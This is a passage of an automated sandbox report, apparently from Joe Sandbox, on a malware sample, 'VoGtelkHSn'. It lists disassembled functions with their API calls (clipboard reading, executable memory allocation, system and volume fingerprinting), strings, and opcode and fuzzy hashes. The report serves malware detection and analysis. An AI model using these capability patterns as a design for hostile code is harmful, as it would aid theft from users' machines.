RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 0041499D
RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 004149CE

Strings

qrs, xrefs: 00414A04
<Y.[, xrefs: 00414A5E
r]Nm, xrefs: 00414B69
2M#O, xrefs: 004149EC

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 2M#O$<Y.[$r]Nm$qrs
API String ID: 237503144-2765572984
Opcode ID: 1eeaee2e8186193ac6611b8cf20863375f2d41a74451ba6092e37ba744e7f2b9
Instruction ID: f437b4c60a0e393287c60c1191dc60451405bce4f387bbd6b600237a0ee68e47
Opcode Fuzzy Hash: 1eeaee2e8186193ac6611b8cf20863375f2d41a74451ba6092e37ba744e7f2b9
Instruction Fuzzy Hash: C751B2B46183419FD320CF14D891BABB7E5EFC6324F054A1DF9958B381E3B89941CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00424AF5 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 433
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 004250BF

Strings

M:h:, xrefs: 0042520A
hFt=, xrefs: 00425203
P6D+, xrefs: 00424FA1

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: M:h:$P6D+$hFt=
API String ID: 3960555810-4191368970
Opcode ID: c278c4235c0e40e0a55a1437a375328b041559dd9e5fde0177f8855f0f599da5
Instruction ID: 6d38b88902e1eb16ca30da568e3269f0221434b507219f1e067bc0dfabd335eb
Opcode Fuzzy Hash: c278c4235c0e40e0a55a1437a375328b041559dd9e5fde0177f8855f0f599da5
Instruction Fuzzy Hash: 6BF14C70504F928BD726CF35C4687A3BBE1AF56308F44496EC4FA8B792C779A406CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00424F8F Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 366
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 004250BF

Strings

M:h:, xrefs: 0042520A
hFt=, xrefs: 00425203
P6D+, xrefs: 00424FA1

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: M:h:$P6D+$hFt=
API String ID: 3960555810-4191368970
Opcode ID: f007e3d9ca2201ad5f316ff58b39a856bbcbb1e41c1eb315934e33bab86fd111
Instruction ID: f66b18d75a9a4d2bb6148ac8f6660ab2d7ad2189567b3251afa320a6a21df7b8
Opcode Fuzzy Hash: f007e3d9ca2201ad5f316ff58b39a856bbcbb1e41c1eb315934e33bab86fd111
Instruction Fuzzy Hash: 0ED15A70504F528BE726CF35C4A87A7BBE1AF56308F44496DC0FA8B792C779A406CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041DF50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0041E08D
RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 0041E0BC

Strings

ru, xrefs: 0041DFDB
M3, xrefs: 0041E171, 0041E175

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: ru$M3
API String ID: 237503144-652937946
Opcode ID: 7291a3a811873626bd3b785a5b847c75c0ba1258cac978df8a67f20d3e36ac33
Instruction ID: ee0422986e9a500056daf517ec787597a82c07e08ececa7a1628db096f87ed23
Opcode Fuzzy Hash: 7291a3a811873626bd3b785a5b847c75c0ba1258cac978df8a67f20d3e36ac33
Instruction Fuzzy Hash: 585153B5108381AFE314CF01C990B5BBBE5ABCA354F10892DF8A55B381C775DA868B96

Uniqueness

Uniqueness Score: -1.00%

Function 00431DD5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00431E18

Strings

\, xrefs: 00431DE3
C, xrefs: 00431DD5
:, xrefs: 00431DDC

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: InformationVolume
String ID: :$C$\
API String ID: 2039140958-3809124531
Opcode ID: 66204d55befe17f0d94a4a8d29d4561092dd70cceac0cbdb9e091147346ca143
Instruction ID: c07b020124bcaf9168d5cc752a0c39b43d1a69f77c2585f3e396cbfa2ffbe00c
Opcode Fuzzy Hash: 66204d55befe17f0d94a4a8d29d4561092dd70cceac0cbdb9e091147346ca143
Instruction Fuzzy Hash: 09F06574654301BBE328CF10ED27F1A72A49F86B04F20982DB245961D0E7B5AA189A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00408C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 00408CFE

Strings

in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified, xrefs: 00408CBD

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: ExitProcess
String ID: in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified
API String ID: 621844428-4175449110
Opcode ID: fabb64060f129b09b2fb295de89773e3c4aadf7bbb2d4122ec10e8a8cd5565c7
Instruction ID: 59104990f458cfd7c5091e5889e4cb5e8d5d284f7426018ae83b6ee6547e8fc3
Opcode Fuzzy Hash: fabb64060f129b09b2fb295de89773e3c4aadf7bbb2d4122ec10e8a8cd5565c7
Instruction Fuzzy Hash: 8CF081B180D61496FA107BB56B0A26A3E786F20354F10063FE8C2751C2EE3D444952BF

Uniqueness

Uniqueness Score: -1.00%

Function 0042D608 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL ref: 0042D6B9
GetSystemMetrics.USER32 ref: 0042D6CA

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: CallbackDispatcherMetricsSystemUser
String ID:
API String ID: 365337688-0
Opcode ID: 9f3c4366f6acc61bef91b6474569325c5038b687278105cc48c3da76987b540e
Instruction ID: e31df5cf53579e26f0d038b5bc67af8e11bea7006768dfca6b49015060dc1ea9
Opcode Fuzzy Hash: 9f3c4366f6acc61bef91b6474569325c5038b687278105cc48c3da76987b540e
Instruction Fuzzy Hash: D53154B4A10B009FD360DF3DC945A22BBE8FB0C600B100A2DE99AC7B50E734B8448B96

Uniqueness

Uniqueness Score: -1.00%

Function 00417810 Relevance: 3.1, APIs: 2, Instructions: 65COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 0041784A
RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 0041787E

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 591883fc8cc7e98f5393b82a229ecb00a65222f46bfedd7c35e61c2a286ee97b
Instruction ID: 5e955635065adc13492d4d85393db762cd4c4b4ecf76f0ca5c4caab7127c9149
Opcode Fuzzy Hash: 591883fc8cc7e98f5393b82a229ecb00a65222f46bfedd7c35e61c2a286ee97b
Instruction Fuzzy Hash: EF0104719082047BE7109B65DC86FA77BACEB86774F044629F965C72D0E730A814CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 02EB0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02EB0223,?,?), ref: 02EB0E19
SetErrorMode.KERNELBASE(00000000,?,?,02EB0223,?,?), ref: 02EB0E1E

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 7c0daa33c795dd7ca716775d119377a50544ef27166bc557bc48ce0b05e24fda
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: C9D0123514512877DB012A94DC09BCE7B1CDF05B66F008011FB0DD9080C770954046E5

Uniqueness

Uniqueness Score: -1.00%

Function 00427F5A Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00428071

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 92e831a09bc4f936f48e8eeb5ce323eeb4de5efd6650885b8006177c34b915f1
Instruction ID: 185172400866e4ae2881ea4d0131f492a55f0fd6362865a65d31d09921d293dc
Opcode Fuzzy Hash: 92e831a09bc4f936f48e8eeb5ce323eeb4de5efd6650885b8006177c34b915f1
Instruction Fuzzy Hash: 42416870208B82DFC324CF28C498716BBE1BB89314F04465DD4EA8BB91DB35E659CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00427F84 Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00428071

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: bf016d29e845508b4c29d0072d113b8df78977f943dd86dea3f8dc8c8d2ed8b8
Instruction ID: 21573400e3ca828b42bd540557a661cbeabd0db8bcf4d465cb8ddca8d915cba3
Opcode Fuzzy Hash: bf016d29e845508b4c29d0072d113b8df78977f943dd86dea3f8dc8c8d2ed8b8
Instruction Fuzzy Hash: 9A414770108B829FD315CF28C498746FFE0BB5A314F04875DD0EA8BB91D775A619CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00436209 Relevance: 1.6, APIs: 1, Instructions: 87libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE ref: 0043638B

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 58b5376ab79715266d38842c771b014d24dd78366dfdce20fb51004989b06f61
Instruction ID: 57a5b52b1dba13f0fb7b71c5e03f91b2e2e218f0aa26cdb764fcf0a20072f155
Opcode Fuzzy Hash: 58b5376ab79715266d38842c771b014d24dd78366dfdce20fb51004989b06f61
Instruction Fuzzy Hash: 65410770509342AFE708DF11C5A072BBBE2EFCA709F15991CE0851B381C779C94A8F9A

Uniqueness

Uniqueness Score: -1.00%

Function 00435F1F Relevance: 1.6, APIs: 1, Instructions: 68libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE ref: 00436001

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: cf479fc7f12fc99e722106fa3c3008013ec3b7fe3fd27b656824b1d85b0085cc
Instruction ID: 23712f21be747c25dae20e80d5a1b49733b7d245948cfec0266e9d122107ec55
Opcode Fuzzy Hash: cf479fc7f12fc99e722106fa3c3008013ec3b7fe3fd27b656824b1d85b0085cc
Instruction Fuzzy Hash: 3B219074519301ABD308CF20DAA072F7BE2AB86308F158A2DF48557251EB35C9058B8A

Uniqueness

Uniqueness Score: -1.00%

Function 00433B50 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00433BF1

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 54449b854ee1baebf3dc2fe8c903120477d739f3de66941c925630f34d378c1f
Instruction ID: 0fd3648b48a7544cf81d28ba84819feb0670e69c12155dd868ef03761d14a466
Opcode Fuzzy Hash: 54449b854ee1baebf3dc2fe8c903120477d739f3de66941c925630f34d378c1f
Instruction Fuzzy Hash: F9111871208301AFD704CF15D46475BFBE5EBC5329F108A1DE8A90B691CB79EA09CBC6

Uniqueness

Uniqueness Score: -1.00%

Function 004375CD Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 00437658

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cc0bdeeb390416a8005f9aaf9f86a7cb8d3b6ea8d4e88d9dbda576cfd526ac67
Instruction ID: 13577f52a53989cb91e50d4060b8e90c8ca223ec1dc92ff7deb6a5357cfe3386
Opcode Fuzzy Hash: cc0bdeeb390416a8005f9aaf9f86a7cb8d3b6ea8d4e88d9dbda576cfd526ac67
Instruction Fuzzy Hash: F30120715083519FE310CF04D99470FBBA2EBC4328F248A4DE8A82B285D375E9098BD2

Uniqueness

Uniqueness Score: -1.00%

Function 00433C2A Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000), ref: 00433CB4

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 568252abd8bdcc9c59ee4889d44cb61b75dc80544815d0b9ec631bb4bbfb7d65
Instruction ID: 6d027317d9507f32588684f48b86e6a4e16b8ed02588133254db7ad3e02295f4
Opcode Fuzzy Hash: 568252abd8bdcc9c59ee4889d44cb61b75dc80544815d0b9ec631bb4bbfb7d65
Instruction Fuzzy Hash: 1C01C8701083409FE314CF10C46471BBBE1EBC9328F208E4DE8A917691C779D949CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 02BF7E3D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02BF7E8E

Memory Dump Source

Source File: 00000000.00000002.2298209608.0000000002BF7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02BF7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bf7000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 269d887b223fdb9a2e395897a8099eb912f7572c1e26f91db00d52e280fc37cc
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 61113F79A00208EFDB01DF98C985E99BBF5EF08350F158095FA489B361D771EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0042C500 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 153clipboardCOMMON

Download Yara Rule

APIs

GetWindowInfo.USER32(?,?), ref: 0042C541
OpenClipboard.USER32 ref: 0042C553
GetClipboardData.USER32 ref: 0042C576
CloseClipboard.USER32 ref: 0042C6AD

Strings

9, xrefs: 0042C5F6
;, xrefs: 0042C5FE
:, xrefs: 0042C606
8, xrefs: 0042C612
7, xrefs: 0042C60A

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: Clipboard$CloseDataInfoOpenWindow
String ID: 7$8$9$:$;
API String ID: 2278096442-1017836374
Opcode ID: 76df721bf2a579621502fc47aaa496d3d10c4b1d72995d62b2f3639b8e2e78c9
Instruction ID: ec00451678d786202fcc9b385dd1a0758b5b4489dde3fc94fbb9c3a647e150fa
Opcode Fuzzy Hash: 76df721bf2a579621502fc47aaa496d3d10c4b1d72995d62b2f3639b8e2e78c9
Instruction Fuzzy Hash: 9E51CFB0608790DFC720DF38E18571ABBE0AF15314F54895ED8DA8B642D338E946DB6B

Uniqueness

Uniqueness Score: -1.00%

Function 02EB49A7 Relevance: 5.5, Strings: 4, Instructions: 501COMMON

Download Yara Rule

Strings

IDAT, xrefs: 02EB4E6C
IEND, xrefs: 02EB4EE5
IHDR, xrefs: 02EB4DF0
), xrefs: 02EB4A54

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID:
String ID: )$IDAT$IEND$IHDR
API String ID: 0-3181356877
Opcode ID: 6c61cf901b26535caeabdc15e67d8a414de8369403d95b9fb70e03a9b4839c69
Instruction ID: 0be1a52e0df3b0dc3a032381c4f3c8b935ed6a2f1c2ceb181a6c55e0fd87ab6d
Opcode Fuzzy Hash: 6c61cf901b26535caeabdc15e67d8a414de8369403d95b9fb70e03a9b4839c69
Instruction Fuzzy Hash: 73121271A483848FDB05CF28CC947AB7BE1EF85304F04956DEA849B392D379D909CB96

Uniqueness

Uniqueness Score: -1.00%

Function 02EB092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 02EB095F
l, xrefs: 02EB0966
GetProcAddress., xrefs: 02EB09DC, 02EB09DF, 02EB09E4

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: b4dd453108a5522c759e0bce501b0671357776a429a33833e17f0f521ba5b6bb
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: BE3148B6900609DFDB11CF99C880AEEBBF9FF48328F14914AD841A7250D771FA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02EB5557 Relevance: 3.4, Strings: 2, Instructions: 851COMMON

Download Yara Rule

Strings

8, xrefs: 02EB5EE9
0, xrefs: 02EB5EF1

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 700693516f04dbb2e79e809c93771d43800a53ac10f18a519c942675b9b09cc2
Instruction ID: d662c1f9035bc11987ae765824793ea931146050dde1e78a2dadb8e4b1a1c4d9
Opcode Fuzzy Hash: 700693516f04dbb2e79e809c93771d43800a53ac10f18a519c942675b9b09cc2
Instruction Fuzzy Hash: 37726A716083419FD715CF28C890B9BBBE2BF88318F48992DF9898B391D775D944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 004052F0 Relevance: 3.4, Strings: 2, Instructions: 851COMMON

Download Yara Rule

Strings

8, xrefs: 00405C82
0, xrefs: 00405C8A

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 74219af944f1d0cf607542fdc4b406d5d0331be3774f0d6c31aafd409cb9e22a
Instruction ID: e90677fc5bc6961723399dbea62cc0af4d041e1e5ad0231ce18586d502c8b4a7
Opcode Fuzzy Hash: 74219af944f1d0cf607542fdc4b406d5d0331be3774f0d6c31aafd409cb9e22a
Instruction Fuzzy Hash: 5B7245716087409FD714CF18C880B9BBBE2EF98314F58892EE98997391D379D984CF96

Uniqueness

Uniqueness Score: -1.00%

Function 02ED3BAA Relevance: 3.1, Strings: 2, Instructions: 643COMMON

Download Yara Rule

Strings

Z8J*, xrefs: 02ED4C82
+u7, xrefs: 02ED4D48

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID:
String ID: +u7$Z8J*
API String ID: 0-3577212644
Opcode ID: b58526746553565ed0bc82ef2a51b4185dc2defb4154cab81257679e2e3258ae
Instruction ID: 565d09664b6628c0edf07f2055dbb7f1e22dd1c1c8b3bbda20e9b00eca82bdfb
Opcode Fuzzy Hash: b58526746553565ed0bc82ef2a51b4185dc2defb4154cab81257679e2e3258ae
Instruction Fuzzy Hash: 8F326074544B828AD725CF34C4A4BF3BBE1AF56308F08996CD1FB8B682D779A006CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02EB1267 Relevance: 3.0, Strings: 2, Instructions: 518COMMON

Download Yara Rule

Strings

JC, xrefs: 02EB1375
, xrefs: 02EB1530

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID:
String ID: $JC
API String ID: 0-571460022
Opcode ID: 8237440b2d564ce322f90f5c6f76332585ae6391083ee7ebcefec0e17e6b40ae
Instruction ID: 1a6e96b90eb6f8363daf7ef3072d5b9dab85def228fcfeaaec841e55ad4d2b07
Opcode Fuzzy Hash: 8237440b2d564ce322f90f5c6f76332585ae6391083ee7ebcefec0e17e6b40ae
Instruction Fuzzy Hash: 991228715487918BE7268E25C0A03E7BBE2AF82328F18D91ED4DE4F6D5D338D549C782

Uniqueness

Uniqueness Score: -1.00%

Function 02EE9D57 Relevance: 2.8, Strings: 2, Instructions: 310COMMON

Download Yara Rule

Strings

R-,T, xrefs: 02EE9DF7
R-,T, xrefs: 02EE9EE7

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID:
String ID: R-,T$R-,T
API String ID: 0-2000385741
Opcode ID: cd5dd1e870cf72724b0d866ceb1e3723b186c0745ae19588130c5378219dccae
Instruction ID: 3b78e51269a685b474e77768e8206850dca0c3c5d1a87251e44bed0a2a61ae6f
Opcode Fuzzy Hash: cd5dd1e870cf72724b0d866ceb1e3723b186c0745ae19588130c5378219dccae
Instruction Fuzzy Hash: E3A1D271A043128FCB24CF14C49076EB7E1FF88328F159A6CE9969B351D735E855CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00439AF0 Relevance: 2.8, Strings: 2, Instructions: 310COMMON

Download Yara Rule

Strings

R-,T, xrefs: 00439C80
R-,T, xrefs: 00439B90

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID: R-,T$R-,T
API String ID: 0-2000385741
Opcode ID: beaf6ab74895c25652dfa29760b513187473a2e199e85751990dc79056bd5903
Instruction ID: 6b83697ab9183c4f383082baa5586d9202c04d839401bfe1d176d3d13e2e3641
Opcode Fuzzy Hash: beaf6ab74895c25652dfa29760b513187473a2e199e85751990dc79056bd5903
Instruction Fuzzy Hash: B2A1CC71A043128BCB24CF18C49066FB7E1FF88724F199A1DE8959B391D778EC51CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 02EC40B1 Relevance: 2.6, Strings: 2, Instructions: 146COMMON

Download Yara Rule

Strings

", xrefs: 02EC42BE
Z%_#, xrefs: 02EC41B0

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID:
String ID: "$Z%_#
API String ID: 0-3398817662
Opcode ID: ceb84fe9739bdc1f62c3e15358b27742fe77a0e0a6a87763ca9f11eddebe1c37
